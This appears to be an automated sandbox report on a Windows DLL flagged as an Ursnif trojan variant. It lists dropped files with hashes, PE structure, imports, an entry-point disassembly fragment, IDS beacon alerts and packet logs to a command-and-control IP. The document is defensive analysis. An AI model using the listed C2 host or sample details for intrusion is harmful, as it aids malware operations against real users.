Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.283593156851968 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fp1vOBzxs7+AEszIwkn23fp1vOM:p37Lvkmb6KRfBAWZEifB9 |
MD5: | 9BA74AF8C7DB03DB598E428C80A39C24 |
SHA1: | 1118FB7E3A74DEDA5A4E7C1C7D1B054CBE5C6E1C |
SHA-256: | 29709DDB56A51411468E1EF4A5C98A0CFC749ACB37E58B6BD3574F0F2D302722 |
SHA-512: | 6B24DA377F68A32BCBD70C00CCCB521CB67A6353A2BD06E7C811A50E67F2BD83F3F79BA9CFCE53747E3F507453EF1E12734BBF9BF3FA413A8827BDA4EB3F66D9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.600576810696372 |
Encrypted: | false |
SSDEEP: | 24:etGSa/u2Bg85z7xlfwZD6lgdWqtkZf3rtWI+ycuZhN9akS7PNnq:6fYb5hFCD6wWdJ3rY1ul9a3xq |
MD5: | DB32AF94E50432F083E1DEA228EEF8D4 |
SHA1: | 7BA5E52289B5D9BBAEB3647F32315FB9AFE0BE9E |
SHA-256: | C91C4DB3E42338BB928B22C4207308E4153D45AEC8F734030CED671F0EAE83BD |
SHA-512: | 7AFE704910CF7B27D4D9F756F18B47A159C474B6868378CE68EE105D63AF3E0F5CEEC1DEA5539CFED4DA1E76DA73DA353D16319E63E9F200493486314BDC3C75 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.346663629193138 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfDEifeKaM5DqBVKVrdFAMBJTH:Akka6CDEueKxDcVKdBJj |
MD5: | 2F9D5A7D317AB29D714CEFE888F56699 |
SHA1: | 2DE49F06FDE6EAD8ED5886B017B874FAFBCD6356 |
SHA-256: | 728FA4B4FD272923E395304FA5B40B1F2F98C4D39B88F1BCEDCF81287C9F4EFB |
SHA-512: | 6591BE1739BFA8EB5998A6679F865EE3A07363FFA028E0317B73F79ECAEA7675B4BCC16086B425EE74B422898E98874C7C803C5ADB00FD71088CB007A5017069 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.093636689580821 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycxak7Ynqql2PN5Dlq5J:+RI+ycuZhN6xakSl2PNnqX |
MD5: | 27A58DEC34A8A930EAF493E122C1D762 |
SHA1: | 84E4A3CA94FA31FF623DE9EE39782AC021D93B32 |
SHA-256: | C9EEA11CDD016DF97932732100DF2AE3F3250F3C49A9270F0BA04F444096B665 |
SHA-512: | D267C3F6B444275A3B32A42010F7352D7DC5098A10A5B0A5FAD5D7E0B79F286BD5BC45B9D94BE1A07B65195B9D90CCE58FE4E2F9E93E708C41702CE97F1F3074 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.182200628670966 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f52wn0zxs7+AEszIwkn23f52sH:p37Lvkmb6KRfh2q0WZEifh2m |
MD5: | 8CB0C7CD433BDC2F02299B6932B4A9E3 |
SHA1: | 00663A78D6DAD361F367FD49A112A56B5C7DFA2B |
SHA-256: | 97DB1A8D4B63512E0C57B113E1F95D861B1FBE14D394B9888480BFB2AD6C3F13 |
SHA-512: | 3072FB0116DB38CBF12CBDBA7D6820DA0C401A7FD7BBB37ACA9564985A3C3F8363D54F0807E06FC2B94D2C9D2B2F94D7E7D74A5B40A1B2C0227CDE522CDBB902 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6207839132053006 |
Encrypted: | false |
SSDEEP: | 24:etGSo8OmU0t3lm85xWAseO4zxQ64pfUPtkZfi1VUWI+ycuZhN6xakSl2PNnq:6iXQ3r5xNOeQfUuJiT31ulQa3cq |
MD5: | 1F0860CDD9E8F6B4501F25728D2131B6 |
SHA1: | 1126BDC01913B693028ECB663123381889362DA8 |
SHA-256: | 3CABCC304A4FA671400D71EBEB21F846983224F97AF93BE2CF2AADA6E3B3E34B |
SHA-512: | E8CD254CCF26A063BD36EF34299F7B9C86450E2A2ED9A958E77F05DE1C829470B0EE6129FA00745ED6A0D8DD9379DB384FF7F704BC5820BBC29A30C0A8F4BCA5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.307968253776901 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfPVEif8KaM5DqBVKVrdFAMBJTH:Akka6CPVEu8KxDcVKdBJj |
MD5: | CEA73A1E9F1D1CC3A29CF5AAE996602A |
SHA1: | 6BF6258A16B4750D4B37D33FF17D8FF99D11ADC9 |
SHA-256: | C232D4309AA78DB4C1FA7E017FA57BFED2E1B05E10090C27DB13BAEB9EE41CC7 |
SHA-512: | 1125BFEC36CDE86F8C6DAC261F366C90723A22633D78C87C03B4048C45D009E18E7602CD9E22029B388E7B57DF0319143756D33449710CEECC21FEC822ED427A |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220504\PowerShell_transcript.506013.O71O_fmz.20220504162805.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1343 |
Entropy (8bit): | 5.36590430076155 |
Encrypted: | false |
SSDEEP: | 24:BxSAI7vBZbx2DOXUWYJobduLCHdV4qWQHjeTKKjX4CIym1ZJXxJobduLCHdV4rN+:BZmvjboO4JobdRdV4tQqDYB1ZDJobdRb |
MD5: | 3FD39DAE5C6C053C927C7C421DF22346 |
SHA1: | 648958C510D633CECD2033A0B76B04A2B8CA6993 |
SHA-256: | 733ABC0BC0C57B87100F55CA1BB3FDCE133B892BF619D86F1C11A2891C3E844E |
SHA-512: | 8DC2BF906F650828FCE8EEC6D7C05B9D5B00DD8044CE5FBD1B7E0220220DBE646C37D118DD9CE6DD886E141EB4A691B43963C214665E03EFAEB55E3C86C5AA1C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.2386475978649285 |
TrID: |
|
File name: | xaj0e933Uv.dll |
File size: | 442368 |
MD5: | 69e570a35f63ea12cbad7a10b25a6ea4 |
SHA1: | f0ca60563eeb9098ad6133daa1fc48c3987437e2 |
SHA256: | 3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6 |
SHA512: | 85658f8418f40fa9f24934b26aa45550dd8fb34425d0af342511b4e64975614071535e99257497f69db25fa87a5cde271bc4a6e1a0971a287f7f2d497d2374ca |
SSDEEP: | 6144:rxpWDRyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rxpuFlJqYhiVDwGU8OqaX1WW3zNg7 |
TLSH: | D494F14977A11DBBEC0807761CF8C52B9B66BE2CA23A70DEA6683CFF7E175511048706 |
File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401430 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
Instruction |
---|
push ebp |
mov ebp, esp |
add ecx, FFFFFFFFh |
call 00007F4F08B3F6FCh |
pop eax |
pop eax |
mov dword ptr [00414544h], eax |
mov edx, dword ptr [00414660h] |
sub edx, 00005289h |
call edx |
ret |
int3 |
push esi |
mov eax, ebx |
mov dword ptr [00414540h], eax |
pop dword ptr [00414538h] |
mov dword ptr [00414548h], ebp |
mov dword ptr [0041453Ch], edi |
sub dword ptr [00414548h], FFFFFFFCh |
loop 00007F4F08B3F6A5h |
mov dword ptr [ebp+00h], eax |
nop |
ret |
lea ecx, ebx |
pop es |
mov ds, word ptr [ecx] |
lodsb |
lea ebp, dword ptr [ecx+6B2EEEC3h] |
movsb |
xchg eax, esi |
xchg dword ptr [ebx], esp |
shl byte ptr [C2100869h], 1 |
loopne 00007F4F08B3F698h |
pop eax |
or ecx, dword ptr [ebx-5F28A8CFh] |
pop ebx |
je 00007F4F08B3F716h |
sbb dword ptr [esi], eax |
sbb bh, dh |
mov ebp, A52AB60Ah |
xor al, F7h |
sbb eax, 442A8BDAh |
mov edx, 8289DCF1h |
wait |
sub byte ptr [eax-20h], dh |
pop ecx |
or esi, edi |
xchg eax, esp |
loop 00007F4F08B3F757h |
xchg eax, edi |
sti |
cmp eax, 3B0AD66Fh |
dec ebp |
mov esp, E193F8C3h |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735880533854 | data | 1.02187881889 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.18017578125 | data | 3.71231531364 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373657226562 | data | 6.02583875365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
msvcrt.dll | strcoll, fgetwc, srand |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/22-16:27:54.122082 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
05/04/22-16:27:53.231327 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
05/04/22-16:27:53.642851 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
05/04/22-16:27:33.120656 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.43.16 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2022 16:27:53.971857071 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971895933 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971906900 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971966982 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972050905 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972095966 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972100973 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972146988 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972150087 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972187996 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972193003 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972234011 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972242117 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972290039 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972290039 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972325087 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972337961 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972372055 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972382069 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972415924 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972421885 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972467899 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972496986 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972552061 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972584009 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972587109 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972615957 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972639084 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983771086 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983803034 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983828068 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983838081 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983849049 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983859062 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983870029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983877897 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983892918 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983903885 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983911037 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983952999 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984617949 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984643936 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984664917 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984678984 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984688044 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984709978 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984730005 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984733105 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984750032 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984771967 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984795094 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985099077 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985153913 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985160112 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985183954 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985202074 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985208988 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985227108 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985235929 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985245943 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985260963 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985274076 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985279083 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985300064 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985321045 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985637903 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985666990 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985686064 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985691071 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985707998 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985726118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985728979 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985749960 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985763073 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985775948 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985790014 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985795021 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985815048 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985841990 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987004042 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987032890 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987055063 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987057924 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987092018 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987140894 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987152100 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987193108 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987329006 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987354040 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987377882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987382889 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987402916 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987416983 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987427950 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987447023 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987484932 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987498999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987517118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987541914 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987565994 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005240917 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005280018 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005304098 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005327940 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005351067 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005352020 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005373955 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005386114 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005393028 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005417109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005429029 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005438089 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005439997 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005464077 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005465031 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005481958 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005489111 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005503893 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005511999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005518913 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005537033 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
